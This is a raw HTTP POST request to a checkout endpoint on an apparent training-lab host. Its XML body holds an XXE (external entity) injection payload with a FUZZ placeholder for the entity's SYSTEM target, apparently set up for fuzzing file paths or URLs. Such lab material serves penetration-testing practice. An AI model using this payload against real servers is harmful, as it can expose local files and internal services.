POST /checkout.php HTTP/1.1
Host: shopdev2.inlanefreight.local
Content-Length: 218
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://shopdev2.inlanefreight.local
Referer: http://shopdev2.inlanefreight.local/cart.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=k0mk769pu9021nrvhnotr2g789
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE userid [
  	 <!ENTITY company SYSTEM "FUZZ">
]><root><subtotal>undefined</subtotal><userid>&company;</userid></root>
